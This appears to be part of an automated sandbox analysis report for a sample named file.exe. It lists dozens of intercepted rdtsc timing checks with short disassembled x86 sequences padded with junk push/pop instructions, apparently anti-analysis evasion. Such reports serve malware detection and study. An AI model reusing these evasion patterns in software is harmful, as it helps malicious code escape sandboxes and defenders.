Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5223FD second address: 522401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 522401 second address: 52240B instructions: 0x00000000 rdtsc 0x00000002 js 00007F5954CE94A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF743 second address: 4AF764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF764 second address: 4AF771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F5954CE94A6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521C2C second address: 521C4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F59556149A4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F595561499Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521C4E second address: 521C52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 521DDC second address: 521DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52806C second address: 52807D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F5954CE94A6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD046 second address: 4BD052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5955614998h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BD052 second address: 4BD088 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B7h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a ja 00007F5954CE94A6h 0x00000010 jmp 00007F5954CE94B2h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528B40 second address: 528B46 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528DEE second address: 528E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F5954CE94A8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jo 00007F5954CE94A6h 0x00000017 pop ecx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528E09 second address: 528E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F595561499Dh 0x0000000f mov eax, dword ptr [eax] 0x00000011 push edx 0x00000012 jmp 00007F595561499Fh 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53007B second address: 530081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 509053 second address: 50906A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F59556149A1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50A144 second address: 50A148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50D2F5 second address: 50D2FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E5B0 second address: 50E5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E5B6 second address: 50E5CD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5955614998h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F5955614998h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50E5CD second address: 50E5D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5116FC second address: 511718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F5955614996h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512729 second address: 51272D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51272D second address: 512731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517AD5 second address: 517AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5954CE94B2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517AEB second address: 517B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F595561499Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517B02 second address: 517B08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 517B08 second address: 517B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518B47 second address: 518B51 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52EDDB second address: 52EDE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52EDE0 second address: 52EDFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5954CE94B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52EDFB second address: 52EE09 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F5955614996h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52EE09 second address: 52EE0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52F6FE second address: 52F723 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jns 00007F5955614996h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F59556149A6h 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FA2B second address: 52FA5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B1h 0x00000007 jl 00007F5954CE94C0h 0x0000000d jmp 00007F5954CE94B4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52FF54 second address: 52FF58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533B1C second address: 533B22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533B22 second address: 533B51 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F59556149A6h 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jnp 00007F595561499Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 533B51 second address: 533B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5384D3 second address: 5384DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5384DA second address: 5384E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5384E3 second address: 5384E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538958 second address: 53895E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538F27 second address: 538F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F595561499Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 538F40 second address: 538F46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539338 second address: 539357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F59556149A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539357 second address: 539368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F5954CE94A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 539368 second address: 53937A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jp 00007F5955614996h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2DB9 second address: 4B2DDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ABh 0x00000007 jp 00007F5954CE94A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F5954CE94A8h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2DDA second address: 4B2DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5955614996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541833 second address: 541839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541839 second address: 54183D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541CAF second address: 541CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jnp 00007F5954CE94A6h 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541E1C second address: 541E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541E26 second address: 541E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541E2E second address: 541E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54227A second address: 54227E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5423D7 second address: 5423E7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jbe 00007F5955614996h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5423E7 second address: 5423FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5423FE second address: 542404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542404 second address: 542433 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jne 00007F5954CE94A6h 0x00000010 pop ebx 0x00000011 popad 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 jc 00007F5954CE94A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542433 second address: 542437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542437 second address: 542448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 ja 00007F5954CE94A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542448 second address: 54244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5425A7 second address: 5425C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5954CE94B5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E394B second address: 4E3956 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5955614996h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3956 second address: 4E3966 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ABh 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C54A6 second address: 4C54B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F595561499Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C54B4 second address: 4C54C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54138D second address: 5413ED instructions: 0x00000000 rdtsc 0x00000002 je 00007F5955614996h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop esi 0x00000010 pushad 0x00000011 jmp 00007F595561499Eh 0x00000016 jmp 00007F595561499Eh 0x0000001b pushad 0x0000001c popad 0x0000001d jnp 00007F5955614996h 0x00000023 popad 0x00000024 popad 0x00000025 pushad 0x00000026 jmp 00007F595561499Ch 0x0000002b push ebx 0x0000002c jmp 00007F595561499Eh 0x00000031 ja 00007F5955614996h 0x00000037 pop ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pop edx 0x0000003c push ecx 0x0000003d pop ecx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5477F9 second address: 547817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94ADh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jp 00007F5954CE94A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE16E second address: 4FE194 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F59556149A3h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jbe 00007F5955614996h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE194 second address: 4FE19A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE385 second address: 4FE3AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 mov dword ptr [esp], esi 0x0000000b and ecx, dword ptr [ebp+122D3905h] 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F59556149A1h 0x0000001a jmp 00007F595561499Bh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE563 second address: 4FE56D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE56D second address: 4FE572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEAF1 second address: 4FEAFB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5954CE94A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEAFB second address: 4FEB00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEB00 second address: 4FEB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jg 00007F5954CE94AEh 0x0000000e jc 00007F5954CE94A8h 0x00000014 pushad 0x00000015 popad 0x00000016 nop 0x00000017 xor edi, dword ptr [ebp+122D382Dh] 0x0000001d push 0000001Eh 0x0000001f or dword ptr [ebp+122D1953h], eax 0x00000025 nop 0x00000026 jng 00007F5954CE94B2h 0x0000002c jmp 00007F5954CE94ACh 0x00000031 push eax 0x00000032 pushad 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEB3D second address: 4FEB4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5955614996h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEECA second address: 4FEEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jbe 00007F5954CE94A6h 0x0000000f jns 00007F5954CE94A6h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEF7E second address: 4FEF82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FEF82 second address: 4E394B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5954CE94B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F5954CE94B9h 0x00000011 jno 00007F5954CE94ACh 0x00000017 popad 0x00000018 nop 0x00000019 jo 00007F5954CE94A9h 0x0000001f movsx ecx, ax 0x00000022 call dword ptr [ebp+122D2B46h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F5954CE94ACh 0x0000002f push ecx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546FCD second address: 546FE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F595561499Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 546FE0 second address: 547015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F5954CE94C8h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547015 second address: 547022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007F59556149A2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5472DD second address: 5472E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5472E1 second address: 547301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F59556149A8h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547301 second address: 547305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547305 second address: 547312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547312 second address: 547318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547318 second address: 547320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547320 second address: 547346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F5954CE94A6h 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F5954CE94A6h 0x00000017 pop edi 0x00000018 je 00007F5954CE94AEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 547346 second address: 547361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F59556149A5h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54994B second address: 549953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549953 second address: 54997E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F59556149A1h 0x0000000d jg 00007F59556149A2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 549ADC second address: 549AE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
